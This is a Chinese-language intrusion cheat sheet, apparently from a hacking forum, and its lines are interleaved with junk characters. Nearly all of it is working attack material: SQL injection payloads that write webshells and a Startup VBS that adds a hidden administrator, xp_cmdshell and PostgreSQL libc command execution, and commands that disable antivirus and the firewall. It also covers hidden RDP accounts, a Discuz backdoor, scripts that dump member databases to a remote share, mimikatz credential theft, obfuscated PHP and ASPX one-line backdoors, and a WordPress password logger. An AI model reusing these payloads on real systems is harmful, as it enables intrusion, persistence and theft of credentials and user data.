SELECT password_hash FROM sys.sql_logins where name='sa'
/ R: R- T! A* h# \9 sSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
  z8 B, z5 n: l- S* T1 M6 P) P4 @access中导出shell
9 M" y5 z7 \) k$ @* ^; i- D: a4 M' W/ e; o3 I
中文版本操作系统中针对mysql添加用户完整代码:8 q2 x7 M$ o$ b+ z  j- n& o
* D3 u% ^8 T9 D: {- ~
use test;6 ]5 `# G& M  G. g
create table a (cmd text);
1 S, Y7 }/ g3 s$ l" ~; m7 Pinsert into a values ("set wshshell=createobject (""wscript.shell"") " );( M! _3 J% M; S5 g1 r; F
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );" q) k2 ~6 i! L* V( R+ S- D
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
' `5 G; I5 R3 q; W  ]" ]select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
! a. f5 n6 `/ Y& N' Kdrop table a;2 B1 U6 _  w& l' M

- s( k1 P; F9 H% C- ~" X英文版本:
( g. D9 r3 J1 F1 |+ f; Y" f! l+ ^
# S/ b0 Q2 D; Q7 d9 l6 @& g; ^use test;, u+ M. F6 {% U$ v" u8 d) J4 {
create table a (cmd text);8 z9 r* p! s9 \7 o+ I! t
insert into a values ("set wshshell=createobject (""wscript.shell"") " );3 t( M& @' q2 d5 \; B' ~
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
/ U$ K$ W, \! k* w. A& @0 Q; ^insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& x' G1 T7 w8 r5 t- f4 d- S5 Rselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
( E6 P0 y! H2 Y7 m- t$ e; xdrop table a;9 _; e% B( C8 _! D1 `+ B4 A+ L, f

  I& C4 {, x! F5 i; h1 Rcreate table a (cmd BLOB);" n6 _8 C( _4 c- ]1 h
insert into a values (CONVERT(木马的16进制代码,CHAR));3 V5 H4 w. ^% L$ Q8 H1 ^
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'- Q3 s3 z, d! Y' R# T9 [
drop table a;7 ?$ ^6 P( t4 t+ q' k0 j
6 A/ ~1 N: x4 V+ N
记录一下怎么处理变态诺顿
" ^; e7 c! ^' \! K; e& {4 q6 ~; f查看诺顿服务的路径/ |6 U0 r7 @9 A; L6 h
sc qc ccSetMgr
! p( K! h# r  u9 w1 y' p然后设置权限拒绝访问。做绝一点。。! ?& n9 ~0 U* _0 S& \
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system9 O2 {. g$ N2 z4 p* @2 N4 @% s- h
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"; j7 S- S6 k+ f: z( @9 B
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators3 {; S" I4 l5 I& t8 a$ u
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
9 f0 G5 y, N( F" z% M5 k( D2 M/ D8 n
然后再重启服务器
3 s1 V0 L9 x2 x$ K2 a  `iisreset /reboot% g4 e1 e) P  s. [: D$ l6 p" N
这样就搞定了。。不过完事后。记得恢复权限。。。。
9 \) V; m; k2 ]5 [) C$ E: ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F3 N/ {; {  b2 P, i9 V) q8 S
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
3 q, j9 R: e8 t) c" y/ icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
& i5 Q6 l$ o: K% v* gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F: n+ Y8 f5 ?6 k8 d! `! H1 _
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
4 g. {( G- U* Q  f  o8 s! e
& F9 l- I% \% ^8 @9 `& HEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')2 O) p; W  x9 w! ~& y" q9 D
/ o& O3 g8 ~/ a! o
postgresql注射的一些东西
4 E! t  n# U6 J: i如何获得webshell
" @5 ]4 q! v- f! e0 b4 mhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
( j6 c; ?7 |$ g* A9 e- yhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
0 H( b3 M5 k" [; Ghttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
& _# v0 ^3 \0 }; ?如何读文件
. ]( b9 q4 V! Chttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
4 Y( S7 |6 q+ F$ Y/ Dhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
3 e0 I3 `) R/ I# M2 mhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;; A5 W4 `4 f# s

' D1 n! C4 L3 d) C. Fz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。; o5 s" \/ x5 e
当然,这些的postgresql的数据库版本必须大于8.X; c' i/ c( i$ n% J, l
创建一个system的函数:4 F0 V" ]9 o2 C
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
/ q/ m3 j8 p& I
6 o) G" M% U$ W4 t4 ]创建一个输出表:
5 T  F7 n% j: M* y  ?9 aCREATE TABLE stdout(id serial, system_out text)2 ]7 @" L$ M' |* k: h5 w( x
, N- ?1 k7 ~- R' ~6 q! Z. I% e0 p2 |7 y
执行shell,输出到输出表内:- ~: J7 i1 k7 ]) H3 m
SELECT system('uname -a > /tmp/test')
1 g' V& P& V: @9 q% }( g
6 i+ K; m. p% \7 A; T/ o: Icopy 输出的内容到表里面;
6 p/ V6 v; c( c; MCOPY stdout(system_out) FROM '/tmp/test'7 y0 Q9 O/ b  e0 h

2 z$ N/ V3 ?- t1 e从输出表内读取执行后的回显,判断是否执行成功
5 G9 F5 l- i' B4 e- _+ z1 B' z1 p6 N& H
SELECT system_out FROM stdout
1 @0 o' Z+ j3 d- ^  p7 L下面是测试例子8 |) `! N. h+ t9 g# K& i, D* p# }

7 v* J* ?0 X' N/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 0 y# D2 \" o3 u1 X4 j' c- N: s3 D5 W

5 w# a9 y4 j  z) j, {4 x5 o$ ]- b. J/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
8 }; p6 i" n- \" B5 R. n: eSTRICT --
# S! E0 g; s* A6 N; o) v# u2 {; C. ^: |) [
/store.php?id=1; SELECT system('uname -a > /tmp/test') --) v! G0 {# Z. M5 `) c8 R2 F! G
' F2 p; _: y7 G
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --0 M4 L# C& Q" K6 y
( R/ D) ]3 c( p' Y
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
8 H6 B! M+ n/ ynet stop sharedaccess    stop the default firewall
! b( ]: F. Y; r* [- O) X1 Mnetsh firewall show      show/config default firewall6 \, [$ f4 m. H1 Q3 C) }$ Q
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall3 E% @$ g  [  Y9 Q+ ^6 U2 o
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall3 a3 b* Y9 z) q
修改3389端口方法(修改后不易被扫出)4 h  |$ `! A% N& }+ K
修改服务器端的端口设置,注册表有2个地方需要修改# O. x( t4 S- q# O# k  L9 B3 h

9 H, l" }: q: V8 ~, u8 z+ D0 y[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
9 W9 C2 z0 y& P7 SPortNumber值,默认是3389,修改成所希望的端口,比如6000
7 L) }5 W4 t# M( L/ x
. b5 O  x/ w4 o5 _第二个地方:
* r- X( D  ?+ w: z; G1 `  C[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] $ o1 k- c# K* v/ o) E& g2 p
PortNumber值,默认是3389,修改成所希望的端口,比如6000" s2 J5 M, t6 u% k

- S& Z+ ]$ w8 o' `% t现在这样就可以了。重启系统就可以了  e  G8 W, U# h( s) n: v. L1 z

4 X5 M- i- e# H; `, H9 b& i查看3389远程登录的脚本
+ f! Q! d4 O% I: X+ Y保存为一个bat文件
1 ]3 ?( x. i. |# }6 D2 ^' @date /t >>D:\sec\TSlog\ts.log
  W" ?/ J! W, Z. `3 b3 X& Ptime /t >>D:\sec\TSlog\ts.log, @- I; K, G1 n7 f3 ?
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log# S4 y: R" I' M" e6 u/ V% W
start Explorer
1 N# g$ J' Q8 O0 b/ z% z* _
6 E# n$ O; w+ w: Smstsc的参数:# m5 {8 v& i! }7 [
0 h+ y) X- G! l9 Z0 Y
远程桌面连接, u% Z* r0 r5 l7 k  e- a
8 Y% v2 }- j; d0 H7 J9 M
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]], X, g+ B. _( S0 Z8 d4 @
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 p1 b( g: S/ P6 P6 s6 O/ `
# v: A( j  p8 Y# t  t$ y  [* a1 J<Connection File> -- 指定连接的 .rdp 文件的名称。' o8 K) z" S+ u, Z, m9 X- ]
+ b, N. p. m0 z  {
/v:<server[:port]> -- 指定要连接到的终端服务器。
, V2 a" r6 e' A8 ]; Y1 q/ ?. v8 |/ G5 g& g) }; Z
/console -- 连接到服务器的控制台会话。
3 b( l7 R5 e( X5 @6 g& b$ z
5 z$ }- y* N3 I% z# Z; E) C4 q/f -- 以全屏模式启动客户端。0 k0 l2 [7 o, y: t1 h
3 p1 m8 U: n1 h& w* W( z$ C* F7 S
/w:<width> --  指定远程桌面屏幕的宽度。
% M$ ]2 u) o, k0 j1 Q
4 ?' P2 Z4 g. T$ C/h:<height> -- 指定远程桌面屏幕的高度。
4 [2 {7 o+ G: i, i$ `5 ?' w# `! @- ~* t( a1 H% x4 g# ?9 u
/edit -- 打开指定的 .rdp 文件来编辑。
, K3 |( K1 a6 _/ [, `: J+ y- O) Z; X6 i
/migrate -- 将客户端连接管理器创建的旧版
' a+ D6 b5 p3 q( a7 g连接文件迁移到新的 .rdp 连接文件。
; h1 W2 M5 `1 _  _& b0 g8 }# U/ a* s- K, v" [$ _
3 N2 ~# M$ f- ^  o2 M! B- \' O) g+ }
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
) F5 g* ?: t- w9 C5 jmstsc /console /v:124.42.126.xxx 突破终端访问限制数量( D2 ]( s$ }. K+ O( D5 }
1 G# j4 g# l* e5 h4 O% n( J$ D3 S
命令行下开启33891 ?0 h/ a" Q. ~0 f1 W
net user asp.net aspnet /add
' c- o; G% r1 {# \* u( W  @$ {( ~: Lnet localgroup Administrators asp.net /add
- C+ Z: t' l; R) e6 v! S; r2 `net localgroup "Remote Desktop Users" asp.net /add
/ ~; Q! U" w% I; {; Z( |attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D9 V5 J: `3 [- a6 {
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 00 Q2 n" g: m# Y% \" x
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1' X1 y6 u. R) R" {  s% H
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f, i6 O( ^! G5 Z
sc config rasman start= auto
: ~5 a0 _, w4 }; @3 n7 [* y  ?sc config remoteaccess start= auto
9 _# k3 K2 o/ c  G' t: Vnet start rasman
- C( x  \& z3 q5 W' snet start remoteaccess
/ s8 W2 s2 a+ `5 w0 ?2 s, z) B9 PMedia8 {/ t3 e4 i  {9 W) m
<form id="frmUpload" enctype="multipart/form-data"
; Z$ u6 ~& e5 Y7 f5 b6 U& Yaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>) ]6 [: ?2 O" h) z7 P' [/ Z
<input type="file" name="NewFile" size="50"><br>
- {$ _7 x  n' y8 ~9 [<input id="btnUpload" type="submit" value="Upload">" N2 T, ^5 q. z1 B
</form>2 O. J+ m* h# C6 t
6 \( }; L$ E) e& b3 U- u
control userpasswords2 查看用户的密码# M- x: Y, s3 h' ~% p! J6 Q" l  P- c
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径' s+ `+ K, o+ A0 j; g$ g! S% k
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a1 R* F' B  w. J# K, s
8 L9 G5 k; l7 h! d' ^7 j9 g
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
. b4 _  j! U7 E0 n/ h( _4 ~. n" L测试1:
; L. l4 W0 `9 N, N) ^3 z8 m  y# rSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
1 E8 _. m  {) [, I8 B$ l5 i' q& w6 `+ j3 p( A0 e3 z" p3 U, \
测试2:
& \" \/ T; U9 X7 @) J/ {5 T% O$ w( j; J7 H! T% G7 k
create table dirs(paths varchar(100),paths1 varchar(100), id int)
! \' ?/ R8 }. ]( A) w$ O0 `+ W; h1 ^, b4 h! q; c
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--4 s# e. A! M  B- B

: s7 q1 W( q% W5 |* TSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1( V' Q3 C. h6 p6 I
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令- q6 \9 l3 W4 p( v3 V
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
7 P0 f+ }- n1 P/ `/ c4 lnet stop mcafeeframework
0 }' J" I  z& F' Enet stop mcshield0 D% H0 }: t! G* O, s
net stop mcafeeengineservice
: ~+ t% E. |3 G. Onet stop mctaskmanager/ g7 Y4 ~& D8 Y, f
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
* A0 n3 ~+ t+ H
1 m. ^) g6 P3 Q: x1 z$ z# q' \  VNCDump.zip (4.76 KB, 下载次数: 1) ) R. _2 L# T5 d5 ?: _/ M5 V7 U
密码在线破解http://tools88.com/safe/vnc.php
, w9 Y; t# c  WVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取, z6 h4 p) H- j
- t9 I+ k% P/ S1 I9 T) r
exec master..xp_cmdshell 'net user'0 W4 N( y" f# @) p. s  o' v4 A
mssql执行命令。
0 |5 M0 ~; b7 e, t获取mssql的密码hash查询
/ O- M4 M7 H- U2 \select name,password from master.dbo.sysxlogins: h5 M" ?7 B5 N/ i9 _
3 N/ m0 U5 v4 X6 ^' b, m# }
backup log dbName with NO_LOG;
" o# r4 j# y, nbackup log dbName with TRUNCATE_ONLY;: ^" y( n, ~) ?( y) i
DBCC SHRINKDATABASE(dbName);# t/ d6 M: E- h
mssql数据库压缩, v6 h4 \! D1 i3 n
7 b( W. f. c( q5 O( S5 V4 q9 x
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
! t8 O  ]& e7 l) d3 C将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
3 Y" }# G+ O, O; x# @: ]% B2 B% y* _1 T" C: m
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
0 |$ k/ Q! X  O2 s3 f4 b备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
( q: {) e. T- z2 x# B2 b7 J0 G0 _" g8 H0 K6 P- v- a7 D
Discuz!nt35渗透要点:
* \8 ?; i# D# t6 i4 G(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default# _/ a- I4 Z8 ^
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
$ `+ X5 H) n7 \1 x! n0 T1 }8 y(3)保存。
: C1 L7 \" v: E/ G; s9 Q(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
2 S' P3 J1 b' f+ rd:\rar.exe a -r d:\1.rar d:\website\+ u- G3 h4 F! R
递归压缩website+ M6 q  a9 A( y" ^! H0 D
注意rar.exe的路径
4 }/ E2 B8 p- X2 d. q; j. R' [
# E& N5 \. I& u' c$ P1 {! n<?php
* J7 _* W( g$ s3 ?  i1 [8 {' }
7 }$ [( B' t* z- K$telok   = "0${@eval($_POST[xxoo])}";2 n/ h4 k0 V9 [1 w

& ~+ o2 h8 o4 ^( e1 X$username   = "123456";
" ?6 Q: r; t; \+ P9 w, K$ L; ?, P& K4 Q; P8 I) Z1 z2 L6 P
$userpwd   = "123456";5 b1 ?) h2 J4 ?6 y9 n& a/ a, f$ V
: D* ]) n# Y: I, p' }% W
$telhao   = "123456";8 ]3 G, u; J# o5 ~" n

3 b' `) |1 ^1 j' x$telinfo   = "123456";  m' W& z  y- N/ H

- m$ Y6 z" C$ S9 A8 I/ ^- u  a" a  `?>5 F! X8 b/ e, k4 G* o& b, f. q
php一句话未过滤插入一句话木马
7 s. x! U' d9 H$ g2 [# @$ h7 w
& ]" x( A, s; F, B9 F站库分离脱裤技巧
' M% U  H  |  z. Q+ Gexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
3 J$ X7 e9 w& k; e. jexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'. |0 A' p4 F! U, _2 Z& \8 N; L6 G
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
$ y& q8 ^: V# j9 F( F这儿利用的是马儿的专家模式(自己写代码)。
' d! G& D& e* @0 y0 h0 I' M: Tini_set('display_errors', 1);
5 i8 F" u; v9 e# eset_time_limit(0);9 B5 `' v% {1 Z6 t
error_reporting(E_ALL);  m, S% ^1 V7 }4 o
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());& p  }  g. b* J) s  _* W7 Z, y
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
( |" y2 k! ^  U3 \' s$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());7 R, D. z8 K" N$ l0 r& J
$i = 0;( y. J) O! R  b/ Y- A( t: N, R
$tmp = '';- f5 M# t, ^% ~$ F: D$ e
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
7 e6 J9 l3 N$ k7 E5 j4 p    $i = $i+1;
. k1 ]5 R( C$ q4 I0 x  c( m4 I1 X7 U    $tmp .=  implode("::", $row)."\n";
  ~4 p: t* ~% Z3 d4 {( c$ L9 J    if(!($i%500)){//500条写入一个文件
7 c8 \' m% G8 _# C9 T- y+ g        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';- z# }8 B# Q! |  ^- x, Y
        file_put_contents($filename,$tmp);  W9 K; K) X: ], l7 q
        $tmp = '';7 x0 C* Y) o' Y8 g/ R: F
    }
: w' P8 X" o8 D' V8 c}: P9 e. n, G3 N: {3 r* y
mysql_free_result($result);) @% v2 D8 ~2 t) `/ f
7 q+ V; M5 B% z, B$ t: q3 h

5 r8 k$ Z& m6 A5 \1 q' q9 S1 A0 P  }" t" a
//down完后delete
% B# m9 `. D; A" C
$ P& \9 n  u6 |0 ^  v
8 P* k# H9 e4 U+ C* C# T. `ini_set('display_errors', 1);
4 h$ v& G) P7 ~error_reporting(E_ALL);
- X; I4 o, v: G6 W$ @% Y$i = 0;
; [. G( v$ O9 J) j% H1 H" Iwhile($i<32) {
9 k7 T7 y+ b5 T* i$ P" K! Q    $i = $i+1;& A* j/ _! S  T7 D+ R9 d& L: @
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
  z* E3 }% J' B; g7 F# @5 x2 V        unlink($filename);) J6 c% r1 M4 i6 u. K( n' x) \2 @
} 5 H5 ]# A2 c( O
httprint 收集操作系统指纹* r5 a2 @/ H; H2 N0 c
扫描192.168.1.100的所有端口
, D1 Z1 ]9 i# k$ h) g/ inmap –PN –sT –sV –p0-65535 192.168.1.1002 B0 n3 p; n1 R! f6 S$ ^5 v! ], M' x
host -t ns www.owasp.org 识别的名称服务器,获取dns信息6 P) @8 B0 Y& W( H
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
9 W0 C* Z  |1 h3 d1 Y, u1 TNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
& a* ?& O: q8 J" ?& m' Y; ~8 w: e+ b* d! C& S4 j
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
1 E: M0 U. `" O: g' J5 b8 l* N7 P4 w8 m8 i8 x
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
- u' Z: b; v6 S9 \& `8 x
' c. p( V) O# j, B0 |" L6 v  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x1 u! y+ c; r- J2 {

) t/ X- O3 K6 @% {3 {  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
3 P, v% `' P) m, u1 q  w# n) k$ b8 \8 O
  http://net-square.com/msnpawn/index.shtml (要求安装)! R) _/ L- |2 Y0 b& J0 P
- F/ F+ h) F% S1 t" V# H# ?
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
: ]. X1 C' c" N& Q& s4 b
# I! d9 V/ x) ~6 p/ [& M; Y9 j" k; z  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)) t. M$ y+ G+ w% i! S5 c
set names gb2312
6 a9 A- n  f& a) ~$ n导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
' R' E' @) y, ^8 [  L' a) ~" y& W8 f0 a1 i# K$ Y9 y( T
mysql 密码修改
3 D/ D' ?' L7 G) e5 c. @$ bUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
$ q" l( Y2 h, S9 rupdate user set password=PASSWORD('antian365.com') where user='root';8 ^6 D  u$ ~% |  R/ Z
flush privileges;, J1 g( U) u8 q. o  c
高级的PHP一句话木马后门, t5 X. K- t. S; ]

9 D+ z' Z: ?( E3 j入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀6 `8 ^# U  G/ G

& |2 R6 ^2 `0 g* e: R1、) ?8 k3 i# N6 e# f& N9 v( ^
" L; L( n5 n9 i6 s( U/ I3 y2 \
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
. J5 h% ?* A8 r, P  s; V) Q
9 U( p' d, F& r5 O6 F& {  p3 i8 w$hh("/[discuz]/e",$_POST['h'],"Access");
3 C, b6 E5 U/ q  r4 }8 x) |: |, e5 W, e1 a8 h7 Q1 Y3 L
//菜刀一句话
6 m5 M* G2 S( d/ p0 |8 j0 P- S& u7 H5 x' U5 [
2、/ L" r5 q! R1 S  B& G. Z0 ?2 s* r
. G; h1 A6 f6 \% X0 f
$filename=$_GET['xbid'];" ^4 j0 w2 M' c! w1 b. Z

1 [8 b# b8 X# Z6 g1 ~6 U3 ?: V' J7 `include ($filename);4 b( ~2 l( V8 C
8 c  d. A/ X, w  J# r0 X
//危险的include函数,直接编译任何文件为php格式运行; f" l4 }5 a& P/ a* k2 z: S
! s3 p# i3 a- `; Q; h
3、" \4 a8 }" k. H# o

, m5 W2 p* a! M1 R3 q$reg="c"."o"."p"."y";2 [* O2 Y1 b# W- l% q: z7 G; H

4 ~! o0 s: W. l9 o$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);+ u" j- c5 Z0 D1 C9 z) C0 T+ i

, q1 x4 j$ }* g//重命名任何文件0 E. z, n1 e8 \6 U  P
( _" k, e" \3 I, z
4、7 J' `% R1 r' ^* Q1 Z% Z
$ k) y8 v2 K! Z% U0 J( q
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
5 K; V7 v( k# V5 T% I* z7 H- `* H6 T! Z9 |6 p
$gzid("/[discuz]/e",$_POST['h'],"Access");
/ Z5 L" d9 g1 l8 U5 C6 _9 v0 h( P+ t% k# C/ ?
//菜刀一句话: j8 O2 f' G( s) ~2 x+ Q( l
7 K3 x3 p; w8 u( p$ \0 Q
5、include ($uid);7 ~& f; R* x" {# e1 Z! u
( h0 a: j* y- f- x
//危险的include函数,直接编译任何文件为php格式运行,POST
8 i" b! ~/ S! Y* e, ]  O. g4 Z- {$ a& r- |* w9 m

. |8 k0 U( j. n9 y+ g+ r//gif插一句话# `2 C8 ?4 m  t0 v

+ h  b9 U6 Z' c* c+ o0 \6、典型一句话
- c2 h8 C8 }+ O: ?7 l7 O( ?/ _1 E8 ~
程序后门代码
1 _4 m! X0 x  m+ P! l9 d<?php eval_r($_POST[sb])?>
, Y3 W- K/ H3 L/ M程序代码* L2 u! [, @( r  ?9 t5 u
<?php @eval_r($_POST[sb])?>- x& P- L% b5 B# B% y3 ~
//容错代码
7 ]/ ?4 X! k3 f/ q. m+ a( d: W程序代码
" ~6 G, W5 L- G4 p<?php assert($_POST[sb]);?>! p* S% ?9 S9 [8 F+ L7 q8 E
//使用lanker一句话客户端的专家模式执行相关的php语句
3 F$ A7 n" Y# e: Y程序代码- B$ T0 j9 Z. ]" Z. K
<?$_POST['sa']($_POST['sb']);?>
. z& G* |2 i6 D" e* ?$ T程序代码
- S1 b: ^- p2 x9 c# z4 j<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>7 q' G* j  s+ }7 V' D
程序代码) U! f% X9 P3 k, O
<?php
: A; s# D( M, P' G- g) }@preg_replace("/[email]/e",$_POST['h'],"error");# v/ L1 Z$ q# x2 G
?>' i. k8 K8 m+ c
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
( B3 n) X; n( E7 H) U程序代码9 ~! }8 c* a0 O/ v
<O>h=@eval_r($_POST[c]);</O>
/ d8 I  S) ^) ~9 W; i! S程序代码
4 ]1 t4 {& @9 c$ q( }8 B<script language="php">@eval_r($_POST[sb])</script>' _6 G( f6 e5 A) I
//绕过<?限制的一句话
& T6 Z, [* y' K7 e
: G4 j/ Q% n. T2 [( |" D* ahttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
9 p" k; a. H. R8 l0 Q详细用法:: m+ {) N) Q+ \/ `% W4 ?
1、到tools目录。psexec \\127.0.0.1 cmd) X! R9 p" W% x& V' g0 t
2、执行mimikatz
; }) b8 S' ~! z2 ^3、执行 privilege::debug
0 X+ B4 t6 N: l1 ?  l7 P4、执行 inject::process lsass.exe sekurlsa.dll
, G! @6 n" ~* u5、执行@getLogonPasswords
, Z" W/ p, |. _; {" [6、widget就是密码
( M( |0 x: U9 U9 E7、exit退出,不要直接关闭否则系统会崩溃。6 W! x9 I$ x- l6 }% ~' E
- B( v& v0 z! w& r) f
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
6 `" D( v% V. ^8 E: `) o$ y; M) [8 t$ W2 y( {& A# J: H- y* p
自动查找系统高危补丁8 P5 Y3 C1 [9 t  v
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
* p/ O( @4 k; O' l/ k
8 S* ?+ y% G9 g2 i1 r* `$ Z5 S! w突破安全狗的一句话aspx后门3 T* T) ~" T& W/ l; {
<%@ Page Language="C#" ValidateRequest="false" %>. y2 |% _: q! j2 ~5 a: A
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>: E! K4 S% K/ t2 ~
webshell下记录WordPress登陆密码) l0 z' f/ w! k2 E' w8 B5 s6 X  t& j
webshell下记录Wordpress登陆密码方便进一步社工
* h( E5 U: Z8 s/ v9 N8 x在文件wp-login.php中539行处添加:
' `3 t) Q* H+ v/ R6 ^* e2 m& s// log password6 U# W: Q& u+ S7 B( S, _
$log_user=$_POST['log'];- O- s1 y/ @' }
$log_pwd=$_POST['pwd'];
; y  E5 ?$ |/ H+ k, j$log_ip=$_SERVER["REMOTE_ADDR"];1 y. }* e; J: i/ s2 N5 t
